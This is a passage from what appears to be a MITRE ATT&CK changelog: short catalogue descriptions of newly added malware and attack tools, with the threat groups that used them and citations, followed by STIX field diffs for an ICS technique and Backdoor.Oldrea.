messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. April 2017)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0887https://attack.mitre.org/techniques/T0887
external_references[1]['source_name']NIST AMS 300-4 April 2018Bastille April 2017
external_references[1]['description']Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K.. (2018, April). Guide to Industrial Wireless Systems Deployments. Retrieved December 1, 2020.Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06
external_references[1]['url']https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdfhttps://www.bastille.net/blogs/2017/4/17/dallas-siren-attack
external_references[2]['source_name']Bastille Dallas April 2017Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018
external_references[2]['description']Bastille. (2017, April 17). Dallas Siren Attack. Retrieved November 6, 2020.Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01
external_references[2]['url']https://www.bastille.net/blogs/2017/4/17/dallas-siren-attackhttps://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf
external_references[3]['source_name']Ars Technica Dallas April 2017Gallagher, S. April 2017
external_references[3]['description']Gallagher, S.. (2017, April 12). Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack. Retrieved December 1, 2020.Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 2020/12/01

Software

enterprise-attack

New Software

[S0677] AADInternals

Current version: 1.1

Description: [AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)


[S1028] Action RAT

Current version: 1.0

Description: [Action RAT](https://attack.mitre.org/software/S1028) is a remote access tool written in Delphi that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 against Indian and Afghani government personnel.(Citation: MalwareBytes SideCopy Dec 2021)


[S1025] Amadey

Current version: 1.0

Description: [Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)


[S1029] AuTo Stealer

Current version: 1.0

Description: [AuTo Stealer](https://attack.mitre.org/software/S1029) is malware written in C++ has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 to target government agencies and personnel in India and Afghanistan.(Citation: MalwareBytes SideCopy Dec 2021)


[S1039] Bumblebee

Current version: 1.0

Description: [Bumblebee](https://attack.mitre.org/software/S1039) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://attack.mitre.org/software/S1039) has been linked to ransomware operations including [Conti](https://attack.mitre.org/software/S0575), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)


[S0693] CaddyWiper

Current version: 1.0

Description: [CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)


[S0674] CharmPower

Current version: 1.0

Description: [CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022)


[S1041] Chinoxy

Current version: 1.0

Description: [Chinoxy](https://attack.mitre.org/software/S1041) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://attack.mitre.org/software/S1041) has been used by Chinese-speaking threat actors.(Citation: Bitdefender FunnyDream Campaign November 2020)


[S0667] Chrommme

Current version: 1.0

Description: [Chrommme](https://attack.mitre.org/software/S0667) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://attack.mitre.org/software/S0666) malware.(Citation: ESET Gelsemium June 2021)


[S0660] Clambling

Current version: 1.0

Description: [Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)


[S1023] CreepyDrive

Current version: 1.0

Description: [CreepyDrive](https://attack.mitre.org/software/S1023) is a custom implant has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.(Citation: Microsoft POLONIUM June 2022) [POLONIUM](https://attack.mitre.org/groups/G1005) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.(Citation: Microsoft POLONIUM June 2022)


[S1024] CreepySnail

Current version: 1.0

Description: [CreepySnail](https://attack.mitre.org/software/S1024) is a custom PowerShell implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least 2022.(Citation: Microsoft POLONIUM June 2022)


[S0687] Cyclops Blink

Current version: 1.0

Description: [Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)


[S1033] DCSrv

Current version: 1.0

Description: [DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021)


[S0694] DRATzarus

Current version: 1.0

Description: [DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020)


[S1014] DanBot

Current version: 1.0

Description: [DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019)


[S0673] DarkWatchman

Current version: 1.0

Description: [DarkWatchman](https://attack.mitre.org/software/S0673) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.(Citation: Prevailion DarkWatchman 2021)


[S0659] Diavol

Current version: 1.0

Description: [Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)


[S1021] DnsSystem

Current version: 1.0

Description: [DnsSystem](https://attack.mitre.org/software/S1021) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2022.(Citation: Zscaler Lyceum DnsSystem June 2022)


[S0695] Donut

Current version: 1.0

Description: [Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020)


[S0679] Ferocious

Current version: 1.0

Description: [Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)


[S0696] Flagpro

Current version: 1.0

Description: [Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021)


[S0661] FoggyWeb

Current version: 1.0

Description: [FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)


[S1044] FunnyDream

Current version: 1.0

Description: [FunnyDream](https://attack.mitre.org/software/S1044) is a backdoor with multiple components that was used during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign since at least 2019, primarily for execution and exfiltration.(Citation: Bitdefender FunnyDream Campaign November 2020)


[S0666] Gelsemium

Current version: 1.0

Description: [Gelsemium](https://attack.mitre.org/software/S0666) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://attack.mitre.org/software/S0666) has been used by the Gelsemium group since at least 2014.(Citation: ESET Gelsemium June 2021)


[S0690] Green Lambert

Current version: 1.0

Description: [Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021)


[S0697] HermeticWiper

Current version: 1.0

Description: [HermeticWiper](https://attack.mitre.org/software/S0697) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)


[S0698] HermeticWizard

Current version: 1.0

Description: [HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)


[S1027] Heyoka Backdoor

Current version: 1.0

Description: [Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022)


[S1022] IceApple

Current version: 1.0

Description: [IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022)


[S0669] KOCTOPUS

Current version: 1.1

Description: [KOCTOPUS](https://attack.mitre.org/software/S0669)'s batch variant is loader used by [LazyScripter](https://attack.mitre.org/groups/G0140) since 2018 to launch [Octopus](https://attack.mitre.org/software/S0340) and [Koadic](https://attack.mitre.org/software/S0250) and, in some cases, [QuasarRAT](https://attack.mitre.org/software/S0262). [KOCTOPUS](https://attack.mitre.org/software/S0669) also has a VBA variant that has the same functionality as the batch version.(Citation: MalwareBytes LazyScripter Feb 2021)


[S1020] Kevin

Current version: 1.0

Description: [Kevin](https://attack.mitre.org/software/S1020) is a backdoor implant written in C++ that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020, including in operations against organizations in Tunisia.(Citation: Kaspersky Lyceum October 2021)


[S0680] LitePower

Current version: 1.0

Description: [LitePower](https://attack.mitre.org/software/S0680) is a downloader and second stage malware that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)


[S0681] Lizar

Current version: 1.0

Description: [Lizar](https://attack.mitre.org/software/S0681) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://attack.mitre.org/software/S0030). It has likely been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least February 2021.(Citation: BiZone Lizar May 2021)(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021)


[S1016] MacMa

Current version: 1.0

Description: [MacMa](https://attack.mitre.org/software/S1016) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://attack.mitre.org/software/S1016) has been observed in the wild since November 2021.(Citation: ESET DazzleSpy Jan 2022)


[S0688] Meteor

Current version: 1.0

Description: [Meteor](https://attack.mitre.org/software/S0688) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://attack.mitre.org/software/S0688) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.(Citation: Check Point Meteor Aug 2021)


[S1015] Milan

Current version: 1.0

Description: [Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)


[S1026] Mongall

Current version: 1.0

Description: [Mongall](https://attack.mitre.org/software/S1026) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://attack.mitre.org/groups/G1007).(Citation: SentinelOne Aoqin Dragon June 2022)


[S1047] Mori

Current version: 1.0

Description: [Mori](https://attack.mitre.org/software/S1047) is a backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)


[S0699] Mythic

Current version: 1.0

Description: [Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to "plug-n-play" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra)


[S0691] Neoichor

Current version: 1.0

Description: [Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021)


[S1017] OutSteel

Current version: 1.0

Description: [OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )


[S0664] Pandora

Current version: 1.0

Description: [Pandora](https://attack.mitre.org/software/S0664) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)


[S1050] PcShare

Current version: 1.0

Description: [PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014)


[S0683] Peirates

Current version: 1.0

Description: [Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub)


[S1031] PingPull

Current version: 1.0

Description: [PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022)


[S1046] PowGoop

Current version: 1.0

Description: [PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)


[S1012] PowerLess

Current version: 1.0

Description: [PowerLess](https://attack.mitre.org/software/S1012) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Cybereason PowerLess February 2022)


[S0685] PowerPunch

Current version: 1.0

Description: [PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)


[S1032] PyDCrypt

Current version: 1.0

Description: [PyDCrypt](https://attack.mitre.org/software/S1032) is malware written in Python designed to deliver [DCSrv](https://attack.mitre.org/software/S1033). It has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021, with each sample tailored for its intended victim organization.(Citation: Checkpoint MosesStaff Nov 2021)


[S0686] QuietSieve

Current version: 1.0

Description: [QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)


[S0662] RCSession

Current version: 1.0

Description: [RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)


[S0684] ROADTools

Current version: 1.0

Description: [ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github)


[S1040] Rclone

Current version: 1.0

Description: [Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)


[S0692] SILENTTRINITY

Current version: 1.0

Description: [SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)


[S1037] STARWHALE

Current version: 1.0

Description: [STARWHALE](https://attack.mitre.org/software/S1037) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069), possibly since at least November 2021; there is also a [STARWHALE](https://attack.mitre.org/software/S1037) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://attack.mitre.org/software/S1037) by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)


[S1042] SUGARDUMP

Current version: 1.0

Description: [SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022)


[S1049] SUGARUSH

Current version: 1.0

Description: [SUGARUSH](https://attack.mitre.org/software/S1049) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://attack.mitre.org/software/S1049) was first identified during analysis of UNC3890's [C0010](https://attack.mitre.org/campaigns/C0010) campaign targeting Israeli companies, which began in late 2020.(Citation: Mandiant UNC3890 Aug 2022)


[S1018] Saint Bot

Current version: 1.0

Description: [Saint Bot](https://attack.mitre.org/software/S1018) is a .NET downloader that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )


[S1019] Shark

Current version: 1.0

Description: [Shark](https://attack.mitre.org/software/S1019) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://attack.mitre.org/software/S1015); it has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least July 2021.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)


[S1035] Small Sieve

Current version: 1.0

Description: [Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022) Security researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)


[S1030] Squirrelwaffle

Current version: 1.0

Description: [Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)


[S1034] StrifeWater

Current version: 1.0

Description: [StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022)


[S0663] SysUpdate

Current version: 1.0

Description: [SysUpdate](https://attack.mitre.org/software/S0663) is a backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)


[S1011] Tarrask

Current version: 1.0

Description: [Tarrask](https://attack.mitre.org/software/S1011) is malware that has been used by [HAFNIUM](https://attack.mitre.org/groups/G0125) since at least August 2021. [Tarrask](https://attack.mitre.org/software/S1011) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.(Citation: Tarrask scheduled task)


[S0665] ThreatNeedle

Current version: 1.0

Description: [ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)


[S0668] TinyTurla

Current version: 1.0

Description: [TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021)


[S0671] Tomiris

Current version: 1.0

Description: [Tomiris](https://attack.mitre.org/software/S0671) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://attack.mitre.org/software/S0671) and [GoldMax](https://attack.mitre.org/software/S0588).(Citation: Kaspersky Tomiris Sep 2021)


[S0678] Torisma

Current version: 1.0

Description: [Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020)


[S0682] TrailBlazer

Current version: 1.0

Description: [TrailBlazer](https://attack.mitre.org/software/S0682) is a modular malware that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2019.(Citation: CrowdStrike StellarParticle January 2022)


[S0670] WarzoneRAT

Current version: 1.0

Description: [WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)


[S0689] WhisperGate

Current version: 1.0

Description: [WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)


[S0672] Zox

Current version: 1.0

Description: [Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)


[S1013] ZxxZ

Current version: 1.0

Description: [ZxxZ](https://attack.mitre.org/software/S1013) is a trojan written in Visual C++ that has been used by [BITTER](https://attack.mitre.org/groups/G1002) since at least August 2021, including against Bangladeshi government personnel.(Citation: Cisco Talos Bitter Bangladesh May 2022)


[S1043] ccf32

Current version: 1.0

Description: [ccf32](https://attack.mitre.org/software/S1043) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign; there is also a similar x64 version.(Citation: Bitdefender FunnyDream Campaign November 2020)


[S1048] macOS.OSAMiner

Current version: 1.0

Description: [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://attack.mitre.org/software/S1048) may have been circulating since at least 2015. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.(Citation: SentinelLabs reversing run-only applescripts 2021)(Citation: VMRay OSAMiner dynamic analysis 2021)

Major Version Changes

[S0093] Backdoor.Oldrea

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) it1[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) i
>s a backdoor used by [Dragonfly](https://attack.mitre.org/gr>s a modular backdoor that used by [Dragonfly](https://attack
>oups/G0035). It appears to be custom malware authored by the>.mitre.org/groups/G0035) against energy companies since at l
> group or specifically for it. (Citation: Symantec Dragonfly>east 2013. [Backdoor.Oldrea](https://attack.mitre.org/softwa
>)>re/S0093) was distributed via supply chain compromise, and i
 >ncluded specialized modules to enumerate and map ICS-specifi
 >c systems, processes, and protocols.(Citation: Symantec Drag
 >onfly)(Citation: Gigamon Berserk Bear October 2021)(Citation
 >: Symantec Dragonfly Sept 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:49:50.902000+00:002022-10-12 17:18:25.971000+00:00
description[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)
external_references[1]['source_name']Symantec DragonflyGigamon Berserk Bear October 2021
external_references[1]['description']Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.
external_references[1]['url']http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdfhttps://vblocalhost.com/uploads/VB2021-Slowik.pdf
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'}
